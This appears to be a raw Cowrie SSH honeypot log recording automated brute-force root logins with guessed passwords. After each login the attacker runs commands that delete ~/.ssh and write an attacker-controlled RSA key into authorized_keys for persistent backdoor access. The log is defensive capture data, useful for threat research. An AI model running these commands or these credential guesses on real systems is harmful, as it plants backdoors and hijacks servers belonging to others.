{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:07.322841Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:33:07.632621Z","src_ip":"212.227.235.229","session":"8644fa0d76b6"}
{"eventid":"cowrie.session.closed","duration":"14.4","message":"Connection lost after 14.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:07.894280Z","src_ip":"212.227.235.229","session":"440990ca4a02"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:07.895273Z","src_ip":"212.227.235.229","session":"8644fa0d76b6"}
{"eventid":"cowrie.login.success","username":"root","password":"zzidc2025","message":"login attempt [root/zzidc2025] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:33:08.433738Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:33:09.038484Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:33:09.039403Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:33:09.040817Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:09.310143Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:33:09.864256Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:33:09.865022Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:33:10.135496Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:10.136470Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54082,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd55bba770d2","protocol":"ssh","message":"New connection: 212.227.235.229:54082 (1.2.3.4:22) [session: fd55bba770d2]","sensor":"my-vps","timestamp":"2025-08-26T04:33:10.404592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:10.405528Z","src_ip":"212.227.235.229","session":"fd55bba770d2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:10.674392Z","src_ip":"212.227.235.229","session":"fd55bba770d2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:33:11.789784Z","src_ip":"212.227.235.229","session":"fd55bba770d2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:13.059986Z","src_ip":"212.227.235.229","session":"fd55bba770d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46196,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c245962ff9b","protocol":"ssh","message":"New connection: 212.227.235.229:46196 (1.2.3.4:22) [session: 8c245962ff9b]","sensor":"my-vps","timestamp":"2025-08-26T04:33:13.328501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:13.329645Z","src_ip":"212.227.235.229","session":"8c245962ff9b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:13.599234Z","src_ip":"212.227.235.229","session":"8c245962ff9b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:33:14.719861Z","src_ip":"212.227.235.229","session":"8c245962ff9b"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:14.989836Z","src_ip":"212.227.235.229","session":"c44db02c8984"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:14.991225Z","src_ip":"212.227.235.229","session":"8c245962ff9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34670,"dst_ip":"1.2.3.4","dst_port":22,"session":"685e4cfee42a","protocol":"ssh","message":"New connection: 212.227.235.229:34670 (1.2.3.4:22) [session: 685e4cfee42a]","sensor":"my-vps","timestamp":"2025-08-26T04:33:34.669440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:34.671131Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:34.743208Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.login.success","username":"root","password":"root@admin123","message":"login attempt [root/root@admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.075202Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:33:35.278820Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.280453Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.281898Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.356087Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:33:35.562023Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.562806Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.637611Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.638640Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34684,"dst_ip":"1.2.3.4","dst_port":22,"session":"33177ec4d449","protocol":"ssh","message":"New connection: 212.227.235.229:34684 (1.2.3.4:22) [session: 33177ec4d449]","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.712224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.713419Z","src_ip":"212.227.235.229","session":"33177ec4d449"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:35.788971Z","src_ip":"212.227.235.229","session":"33177ec4d449"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:33:36.132745Z","src_ip":"212.227.235.229","session":"33177ec4d449"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:37.210948Z","src_ip":"212.227.235.229","session":"33177ec4d449"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33546,"dst_ip":"1.2.3.4","dst_port":22,"session":"98f15c6903ee","protocol":"ssh","message":"New connection: 212.227.235.229:33546 (1.2.3.4:22) [session: 98f15c6903ee]","sensor":"my-vps","timestamp":"2025-08-26T04:33:37.282383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:37.283624Z","src_ip":"212.227.235.229","session":"98f15c6903ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:37.356479Z","src_ip":"212.227.235.229","session":"98f15c6903ee"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:33:37.687027Z","src_ip":"212.227.235.229","session":"98f15c6903ee"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:37.761208Z","src_ip":"212.227.235.229","session":"685e4cfee42a"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:37.762053Z","src_ip":"212.227.235.229","session":"98f15c6903ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44758,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d1b59f8f619","protocol":"ssh","message":"New connection: 212.227.235.229:44758 (1.2.3.4:22) [session: 2d1b59f8f619]","sensor":"my-vps","timestamp":"2025-08-26T04:33:41.539799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:41.540672Z","src_ip":"212.227.235.229","session":"2d1b59f8f619"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:33:41.826530Z","src_ip":"212.227.235.229","session":"2d1b59f8f619"}
{"eventid":"cowrie.login.failed","username":"user","password":"Passw0rd","message":"login attempt [user/Passw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T04:33:43.009372Z","src_ip":"212.227.235.229","session":"2d1b59f8f619"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:33:44.297341Z","src_ip":"212.227.235.229","session":"2d1b59f8f619"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":52538,"dst_ip":"1.2.3.4","dst_port":22,"session":"066ed65935f5","protocol":"ssh","message":"New connection: 68.183.87.241:52538 (1.2.3.4:22) [session: 066ed65935f5]","sensor":"my-vps","timestamp":"2025-08-26T04:33:59.139214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:33:59.140248Z","src_ip":"68.183.87.241","session":"066ed65935f5"}
